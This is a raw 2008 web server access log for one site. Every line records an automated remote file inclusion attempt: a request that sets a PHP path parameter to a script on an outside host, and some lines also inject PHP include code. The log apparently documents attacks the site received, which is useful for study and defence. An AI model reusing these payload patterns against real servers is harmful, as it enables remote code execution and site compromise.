210.109.102.108 - - [01/May/2008:09:20:54 -0700] "GET /index.php?redir=http://69.64.50.43/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:20:56 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:20:56 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [01/May/2008:09:20:56 -0700] "GET ///mambots/content/smoothgallery.php?mosConfig_absolute_path=http://www.jaytotheworld.com//images/data/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
210.113.203.55 - - [01/May/2008:09:20:57 -0700] "GET /logs///mambots/content/smoothgallery.php?mosConfig_absolute_path=http://www.jaytotheworld.com//images/data/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:21:00 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:21:00 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:21:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:21:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:21:05 -0700] "GET /logs/access.log/index.php?sayfa=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:21:13 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:21:13 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:21:13 -0700] "GET /index.php?sayfa=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:21:22 -0700] "GET /logs/index.php?sayfa=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:21:43 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:21:43 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:21:53 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:21:53 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:21:57 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:21:57 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:21:57 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.80.202.91 - - [01/May/2008:09:21:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:21:58 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.80.202.91 - - [01/May/2008:09:21:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:21:58 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:21:58 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:01 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:02 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:02 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:22:04 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:22:04 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:05 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:05 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:05 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:05 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:05 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:05 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.35.158.180 - - [01/May/2008:09:22:15 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:22:20 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:22:20 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:22:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.181 - - [01/May/2008:09:22:21 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:23 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:22:24 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:22:29 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:22:29 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:30 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:22:30 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:22:34 -0700] "GET /logs/access_080131.log/main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:22:34 -0700] "GET /main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:22:34 -0700] "GET /logs/main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:22:47 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:22:50 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:22:51 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:22:51 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.25.120.212 - - [01/May/2008:09:22:58 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.212 - - [01/May/2008:09:22:59 -0700] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:23:05 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:23:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:23:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:23:17 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:23:17 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:23:21 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:23:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.174.212.29 - - [01/May/2008:09:23:26 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.globalcare.or.kr/zboard/data/thumimg/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.174.212.29 - - [01/May/2008:09:23:27 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.globalcare.or.kr/zboard/data/thumimg/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.73.146.54 - - [01/May/2008:09:23:38 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [01/May/2008:09:23:39 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [01/May/2008:09:23:39 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.23.237.236 - - [01/May/2008:09:23:57 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [01/May/2008:09:23:57 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:24:05 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:24:06 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:24:06 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [01/May/2008:09:24:29 -0700] "GET /module_db.php?pivot_path=http://freedomreligion.org/id/modules/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.176.161.208 - - [01/May/2008:09:24:33 -0700] "GET /logs/module_db.php?pivot_path=http://freedomreligion.org/id/modules/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:24:43 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [01/May/2008:09:24:46 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [01/May/2008:09:24:46 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:24:48 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:24:48 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.196 - - [01/May/2008:09:24:50 -0700] "GET /logs/main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.71.196 - - [01/May/2008:09:24:51 -0700] "GET /main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:25:07 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:25:27 -0700] "GET //oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.217.3 - - [01/May/2008:09:25:29 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [01/May/2008:09:25:30 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [01/May/2008:09:25:30 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:25:41 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:25:41 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:25:41 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:25:41 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:25:41 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:25:41 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:25:50 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [01/May/2008:09:25:50 -0700] "GET //popup_window.php?site_isp_root=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:25:50 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.218.137.36 - - [01/May/2008:09:25:55 -0700] "GET /logs/access_080224.log//components/com_forum/download.php?phpbb_root_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [01/May/2008:09:25:55 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [01/May/2008:09:25:56 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [01/May/2008:09:25:56 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [01/May/2008:09:26:12 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [01/May/2008:09:26:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.109.102.108 - - [01/May/2008:09:26:23 -0700] "GET /logs/index.php?redir=http://69.64.50.43/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
210.109.102.108 - - [01/May/2008:09:26:28 -0700] "GET /index.php?redir=http://69.64.50.43/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:31 -0700] "GET /logs/access_080118.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:31 -0700] "GET //home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:26:31 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:31 -0700] "GET /logs//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
69.64.32.223 - - [01/May/2008:09:26:31 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
